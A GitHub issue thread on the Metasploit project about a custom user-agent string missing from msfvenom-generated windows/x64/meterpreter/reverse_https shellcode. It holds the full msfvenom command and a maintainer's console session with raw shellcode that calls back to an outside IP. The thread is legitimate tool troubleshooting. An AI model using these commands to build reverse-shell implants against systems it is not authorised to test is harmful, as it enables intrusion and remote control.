Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

No user-agent embedded in the shellcode via msfvenom with payload 'windows/x64/meterpreter/reverse_https' #19764

Open
sscoconutree opened this issue Dec 25, 2024 · 6 comments
Open

No user-agent embedded in the shellcode via msfvenom with payload 'windows/x64/meterpreter/reverse_https' #19764

sscoconutree opened this issue Dec 25, 2024 · 6 comments
Labels
bug payload question Questions about Metasploit Usage

Comments

@sscoconutree
Copy link

Summary

How come there are no user-agent strings embedded in the shellcode when using this command:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=443 PayloadUUIDTracking=true HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edge/131.0.2903.86" PayloadUUIDName="foobar" -f raw EXITFUNC=thread -o shellcode.bin

I tried to send a request over my web server and this was shown in my apache2 logs.

image

Checking the plaintext of this shellcode, it seems the IP of my web server and the initial URI is only baked.

image

Relevant information

I found a similar issue before and I checked the source code again in the latest version of metasploit and it seems the changes by @busterb from the issue below was already applied however I was still having problems on how to embed the initial user-agent in the shellcode.

#11075
@sscoconutree sscoconutree added the question Questions about Metasploit Usage label Dec 25, 2024
@sscoconutree sscoconutree changed the title No user-agent embedded in the shellcode via msfvenom using 'windows/x64/meterpreter/reverse_https' No user-agent embedded in the shellcode via msfvenom with payload 'windows/x64/meterpreter/reverse_https' Dec 25, 2024
@dledda-r7 dledda-r7 self-assigned this Jan 8, 2025
@dledda-r7 dledda-r7 moved this to Todo in Metasploit Kanban Jan 8, 2025
@dledda-r7
Copy link
Contributor

dledda-r7 commented Jan 8, 2025
edited
Loading

Hello @sscoconutree, I'll look into this, just to triage the issue, are the other options working for you? for example the proxy related options? HttpProxyHost, HttpProxyPort and so on? Thanks!

@sscoconutree
Copy link
Author

sscoconutree commented Jan 8, 2025
edited
Loading

Hello @sscoconutree, I'll look into this, just to triage the issue, are the other options working for you? for example the proxy related options? HttpProxyHost, HttpProxyPort and so on? Thanks!

Hello, I haven't tried those options since it isn't needed in my current experiment and I don't quite know how to integrate those with it.

Thank you for looking into this issue!

@dledda-r7 dledda-r7 added the confirmed Issues confirmed by a committer label Jan 9, 2025
@dledda-r7
Copy link
Contributor

dledda-r7 commented Jan 9, 2025
edited
Loading

@sscoconutree what version of metasploit are you using? make sure your version include this PR:
#19726

make sure you have: metasploit v6.4.44-dev-9b75fc50ec

msf6 payload(windows/x64/meterpreter/reverse_https) > set httpUserAgent AMAZING USER AGENT NOT A MALWARE
httpUserAgent => AMAZING USER AGENT NOT A MALWARE
msf6 payload(windows/x64/meterpreter/reverse_https) > generate -f raw
A���RAQH�R �B<H�f�x`H�RQH�R VH�JJM1�H�rPH1��<a|, A��
A�8�u�LLE9�u�XD�@$I�fA��H��tgH�P�HD�@ I��VH��M1�A�4�H�H1��A��
                       HD�@I�A��AXAXH�^YZAXAYAZH�� AR��XAYZH��K���]H1�SI�wininetAVH��I��Lw&��SS�!AMAZING USER AGENT NOT A MALWAREYSZM1�M1�SSI�:Vy����
                                                                                                                                                     88.88.88.88ZH��I��� M1�SSjSI�W������/XYwR6x1PSXPPnc6fqOJpOAYLH2-WWBC-zQY302m7yzSDB5dTxTPqJjuB_Qh3kOZmjzUHT15UKUuKl7Fl2ep6II0zLi7ZhxxCArFYmSgTt2BLbtFgjFauT9cXRRfV3dMwb0sj2lgZTd8evLcR01VoC8yXkHobOwtxN5_2UYyaEP-MgYwa7GGuH��SZAXM1�SH�2��PSSI���U.;��H��j
_H��jZRh�3I��jAYI�uF����M1�SZH��M1�M1�SSI��-{�Յ�uH���I�D�5���H��t��USYj@ZI����I��I�X�S���H�SSH��H��H��I�� I��I������H�� ��t�f�HÅ�u�X�XjYI���V��
msf6 payload(windows/x64/meterpreter/reverse_https) > banner

@dledda-r7 dledda-r7 removed the confirmed Issues confirmed by a committer label Jan 9, 2025
@dledda-r7 dledda-r7 removed their assignment Jan 9, 2025
@sscoconutree
Copy link
Author

@sscoconutree what version of metasploit are you using? make sure your version include this PR: #19726

make sure you have: metasploit v6.4.44-dev-9b75fc50ec

msf6 payload(windows/x64/meterpreter/reverse_https) > set httpUserAgent AMAZING USER AGENT NOT A MALWARE
httpUserAgent => AMAZING USER AGENT NOT A MALWARE
msf6 payload(windows/x64/meterpreter/reverse_https) > generate -f raw
A���RAQH�R �B<H�f�x`H�RQH�R VH�JJM1�H�rPH1��<a|, A��
A�8�u�LLE9�u�XD�@$I�fA��H��tgH�P�HD�@ I��VH��M1�A�4�H�H1��A��
                       HD�@I�A��AXAXH�^YZAXAYAZH�� AR��XAYZH��K���]H1�SI�wininetAVH��I��Lw&��SS�!AMAZING USER AGENT NOT A MALWAREYSZM1�M1�SSI�:Vy����
                                                                                                                                                     88.88.88.88ZH��I��� M1�SSjSI�W������/XYwR6x1PSXPPnc6fqOJpOAYLH2-WWBC-zQY302m7yzSDB5dTxTPqJjuB_Qh3kOZmjzUHT15UKUuKl7Fl2ep6II0zLi7ZhxxCArFYmSgTt2BLbtFgjFauT9cXRRfV3dMwb0sj2lgZTd8evLcR01VoC8yXkHobOwtxN5_2UYyaEP-MgYwa7GGuH��SZAXM1�SH�2��PSSI���U.;��H��j
_H��jZRh�3I��jAYI�uF����M1�SZH��M1�M1�SSI��-{�Յ�uH���I�D�5���H��t��USYj@ZI����I��I�X�S���H�SSH��H��H��I�� I��I������H�� ��t�f�HÅ�u�X�XjYI���V��
msf6 payload(windows/x64/meterpreter/reverse_https) > banner

Hi this is the version I have: metasploit v6.4.34-dev

I guess I need to update mine.

Thank you for help!

@sscoconutree
Copy link
Author

msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 PayloadUUIDTracking=true HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edge/131.0.2903.86" PayloadUUIDName="foobar" -f raw EXITFUNC=thread -o shellcode.bin

It seems to be working now.

image

Lastly, do we have an option in metasploit to have custom URIs in the shellcode?

@dledda-r7
Copy link
Contributor

dledda-r7 commented Jan 10, 2025
edited
Loading

No, changing the URI with that payload is not possible.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug payload question Questions about Metasploit Usage
Projects
Metasploit Kanban
Status: Todo
Milestone
No milestone
Development

No branches or pull requests
2 participants
@sscoconutree @dledda-r7